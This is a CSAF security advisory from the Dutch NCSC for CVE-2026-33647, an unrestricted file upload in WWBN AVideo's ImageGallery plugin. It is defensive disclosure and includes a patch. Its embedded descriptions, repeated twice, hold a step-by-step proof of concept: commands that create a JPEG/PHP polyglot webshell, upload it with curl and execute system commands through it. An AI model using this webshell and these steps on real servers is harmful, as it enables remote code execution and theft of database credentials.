{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33647",
        "tracking": {
            "current_release_date": "2026-03-25T18:43:33.743965Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33647",
            "initial_release_date": "2026-03-24T10:54:06.472368Z",
            "revision_history": [
                {
                    "date": "2026-03-24T10:54:06.472368Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T10:54:11.264825Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T13:50:56.147187Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T13:51:06.547418Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:53:10.793802Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T21:37:19.939906Z",
                    "number": "6",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:32.741126Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:26:38.506796Z",
                    "number": "8",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-25T18:26:45.316824Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:33:15.426561Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:42:38.883455Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:42:48.050675Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "12"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=26.0",
                                "product": {
                                    "name": "vers:unknown/<=26.0",
                                    "product_id": "CSAFPID-5893889",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33647",
            "cwe": {
                "id": "CWE-434",
                "name": "Unrestricted Upload of File with Dangerous Type"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33647.json"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33647"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution.\n\n## Details\n\nThe vulnerability exists in `plugin/ImageGallery/ImageGallery.php` in the `saveFile()` method:\n\n```php\n// plugin/ImageGallery/ImageGallery.php:80-108\nstatic function saveFile($file, $videos_id)\n{\n    $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n    $directory = self::getImageDir($videos_id);\n\n    // MIME check on file CONTENT — bypassable with polyglot\n    $finfo = new finfo(FILEINFO_MIME_TYPE);\n    $fileType = $finfo->file($file['tmp_name']);\n\n    if (in_array($fileType, $allowedMimeTypes)) {\n        // Extension from attacker-controlled filename — NO allowlist\n        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n        do {\n            $newFilename = uniqid() . '.' . $extension;\n            $newFilePath = $directory . $newFilename;\n        } while (file_exists($newFilePath));\n\n        move_uploaded_file($file['tmp_name'], $newFilePath);\n        // ...\n    }\n}\n```\n\n**Root cause:** Line 93 extracts the extension from the user-supplied `$file['name']` and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., `jpg`, `png`, `gif`, `webp`, `mp4`).\n\n**Why the MIME check is insufficient:** PHP's `finfo` with `FILEINFO_MIME_TYPE` inspects file content magic bytes. A file starting with JPEG magic bytes (`\\xff\\xd8\\xff\\xe0`) is identified as `image/jpeg` regardless of trailing content. 
Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.\n\n**Why no server-level protection exists:** The root `.htaccess` at line 73 blocks dangerous extensions but uses the pattern `php[a-z0-9]+` — which matches `.php5`, `.phtml`, `.phar`, etc., but intentionally does **not** match plain `.php` (since the application itself requires PHP execution). There is no `.htaccess` in the `videos/` directory to disable PHP execution in the upload target.\n\n**Upload path:** Files are saved to `videos/{videoFilename}/ImageGallery/{uniqid}.php` — directly accessible via the web server.\n\nThe upload endpoint at `plugin/ImageGallery/upload.json.php` requires:\n1. The ImageGallery plugin to be enabled (line 6-8)\n2. An authenticated user (line 10-12)\n3. The user must have manage permission on the video (line 18-20) — video owner or admin\n\nThe response at line 27 calls `listFiles()` which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.\n\n## PoC\n\n**Prerequisites:** Authenticated AVideo user account that owns at least one Image or Gallery type video.\n\n**Step 1: Create a polyglot PHP/JPEG file**\n```bash\nprintf '\\xff\\xd8\\xff\\xe0\\x00\\x10JFIF' > shell.php\necho '<?php if(isset($_GET[\"c\"])){system($_GET[\"c\"]);} ?>' >> shell.php\n```\n\n**Step 2: Verify it passes finfo detection**\n```bash\nfile --mime-type shell.php\n# Expected output: shell.php: image/jpeg\n```\n\n**Step 3: Upload via ImageGallery endpoint**\n```bash\ncurl -b 'PHPSESSID=<session_cookie>' \\\n  -F \"upl=@shell.php;filename=shell.php\" \\\n  'https://target/plugin/ImageGallery/upload.json.php?videos_id=<VIDEO_ID>'\n```\n\n**Expected response:**\n```json\n{\n  \"videos_id\": \"123\",\n  \"saveFile\": true,\n  \"error\": false,\n  \"list\": [\n    {\n      \"base\": \"67890abcdef12.php\",\n      \"type\": \"image/jpeg\",\n      \"url\": 
\"https://target/videos/video_filename/ImageGallery/67890abcdef12.php\"\n    }\n  ]\n}\n```\n\n**Step 4: Execute the webshell**\n```bash\ncurl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'\n# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\nAn authenticated user with edit permission on any Image/Gallery video can achieve **Remote Code Execution** as the web server user. This allows:\n\n- Reading sensitive configuration files (database credentials in `videos/configuration.php`)\n- Full database access via the database credentials\n- Reading/modifying/deleting any file accessible to the web server process\n- Lateral movement within the server's network\n- Potential privilege escalation depending on server configuration\n\nAny AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.\n\n## Recommended Fix\n\nAdd an extension allowlist check in `saveFile()` immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:\n\n```php\n// plugin/ImageGallery/ImageGallery.php — in saveFile(), after line 93\nstatic function saveFile($file, $videos_id)\n{\n    $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n+   $allowedExtensions = ['jpg', 'jpeg', 'webp', 'gif', 'png', 'mp4'];\n\n    $directory = self::getImageDir($videos_id);\n\n    $finfo = new finfo(FILEINFO_MIME_TYPE);\n    $fileType = $finfo->file($file['tmp_name']);\n\n    if (in_array($fileType, $allowedMimeTypes)) {\n        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n+       if (!in_array($extension, $allowedExtensions)) {\n+           return false;\n+       }\n        do {\n            $newFilename = uniqid() . '.' . 
$extension;\n```\n\nAdditionally, as defense-in-depth, add a `.htaccess` file to the `videos/` directory to disable PHP execution:\n\n```apache\n# videos/.htaccess\nphp_flag engine off\n<FilesMatch \"\\.php$\">\n    Require all denied\n</FilesMatch>\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-wxjw-phj6-g75w.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution.\n\n## Details\n\nThe vulnerability exists in `plugin/ImageGallery/ImageGallery.php` in the `saveFile()` method:\n\n```php\n// plugin/ImageGallery/ImageGallery.php:80-108\nstatic function saveFile($file, $videos_id)\n{\n    $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n    $directory = self::getImageDir($videos_id);\n\n    // MIME check on file CONTENT — bypassable with polyglot\n    $finfo = new finfo(FILEINFO_MIME_TYPE);\n    $fileType = $finfo->file($file['tmp_name']);\n\n    if (in_array($fileType, $allowedMimeTypes)) {\n        // Extension from attacker-controlled filename — NO allowlist\n        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n        do {\n            $newFilename = uniqid() . '.' . $extension;\n            $newFilePath = $directory . $newFilename;\n        } while (file_exists($newFilePath));\n\n        move_uploaded_file($file['tmp_name'], $newFilePath);\n        // ...\n    }\n}\n```\n\n**Root cause:** Line 93 extracts the extension from the user-supplied `$file['name']` and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., `jpg`, `png`, `gif`, `webp`, `mp4`).\n\n**Why the MIME check is insufficient:** PHP's `finfo` with `FILEINFO_MIME_TYPE` inspects file content magic bytes. A file starting with JPEG magic bytes (`\\xff\\xd8\\xff\\xe0`) is identified as `image/jpeg` regardless of trailing content. 
Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.\n\n**Why no server-level protection exists:** The root `.htaccess` at line 73 blocks dangerous extensions but uses the pattern `php[a-z0-9]+` — which matches `.php5`, `.phtml`, `.phar`, etc., but intentionally does **not** match plain `.php` (since the application itself requires PHP execution). There is no `.htaccess` in the `videos/` directory to disable PHP execution in the upload target.\n\n**Upload path:** Files are saved to `videos/{videoFilename}/ImageGallery/{uniqid}.php` — directly accessible via the web server.\n\nThe upload endpoint at `plugin/ImageGallery/upload.json.php` requires:\n1. The ImageGallery plugin to be enabled (line 6-8)\n2. An authenticated user (line 10-12)\n3. The user must have manage permission on the video (line 18-20) — video owner or admin\n\nThe response at line 27 calls `listFiles()` which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.\n\n## PoC\n\n**Prerequisites:** Authenticated AVideo user account that owns at least one Image or Gallery type video.\n\n**Step 1: Create a polyglot PHP/JPEG file**\n```bash\nprintf '\\xff\\xd8\\xff\\xe0\\x00\\x10JFIF' > shell.php\necho '<?php if(isset($_GET[\"c\"])){system($_GET[\"c\"]);} ?>' >> shell.php\n```\n\n**Step 2: Verify it passes finfo detection**\n```bash\nfile --mime-type shell.php\n# Expected output: shell.php: image/jpeg\n```\n\n**Step 3: Upload via ImageGallery endpoint**\n```bash\ncurl -b 'PHPSESSID=<session_cookie>' \\\n  -F \"upl=@shell.php;filename=shell.php\" \\\n  'https://target/plugin/ImageGallery/upload.json.php?videos_id=<VIDEO_ID>'\n```\n\n**Expected response:**\n```json\n{\n  \"videos_id\": \"123\",\n  \"saveFile\": true,\n  \"error\": false,\n  \"list\": [\n    {\n      \"base\": \"67890abcdef12.php\",\n      \"type\": \"image/jpeg\",\n      \"url\": 
\"https://target/videos/video_filename/ImageGallery/67890abcdef12.php\"\n    }\n  ]\n}\n```\n\n**Step 4: Execute the webshell**\n```bash\ncurl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'\n# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\nAn authenticated user with edit permission on any Image/Gallery video can achieve **Remote Code Execution** as the web server user. This allows:\n\n- Reading sensitive configuration files (database credentials in `videos/configuration.php`)\n- Full database access via the database credentials\n- Reading/modifying/deleting any file accessible to the web server process\n- Lateral movement within the server's network\n- Potential privilege escalation depending on server configuration\n\nAny AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.\n\n## Recommended Fix\n\nAdd an extension allowlist check in `saveFile()` immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:\n\n```php\n// plugin/ImageGallery/ImageGallery.php — in saveFile(), after line 93\nstatic function saveFile($file, $videos_id)\n{\n    $allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];\n+   $allowedExtensions = ['jpg', 'jpeg', 'webp', 'gif', 'png', 'mp4'];\n\n    $directory = self::getImageDir($videos_id);\n\n    $finfo = new finfo(FILEINFO_MIME_TYPE);\n    $fileType = $finfo->file($file['tmp_name']);\n\n    if (in_array($fileType, $allowedMimeTypes)) {\n        $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));\n+       if (!in_array($extension, $allowedExtensions)) {\n+           return false;\n+       }\n        do {\n            $newFilename = uniqid() . '.' . 
$extension;\n```\n\nAdditionally, as defense-in-depth, add a `.htaccess` file to the `videos/` directory to disable PHP execution:\n\n```apache\n# videos/.htaccess\nphp_flag engine off\n<FilesMatch \"\\.php$\">\n    Require all denied\n</FilesMatch>\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-wxjw-phj6-g75w"
                },
                {
                    "category": "other",
                    "text": "0.00209",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.2",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to CWE-434 (Unrestricted Upload of File with Dangerous Type), Is related to (a version of) an uncommon product, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5893889",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33647.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33647"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-wxjw-phj6-g75w.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-wxjw-phj6-g75w"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wxjw-phj6-g75w"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33647"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-wxjw-phj6-g75w"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929",
                        "CSAFPID-5893889"
                    ]
                }
            ],
            "title": "CVE-2026-33647"
        }
    ]
}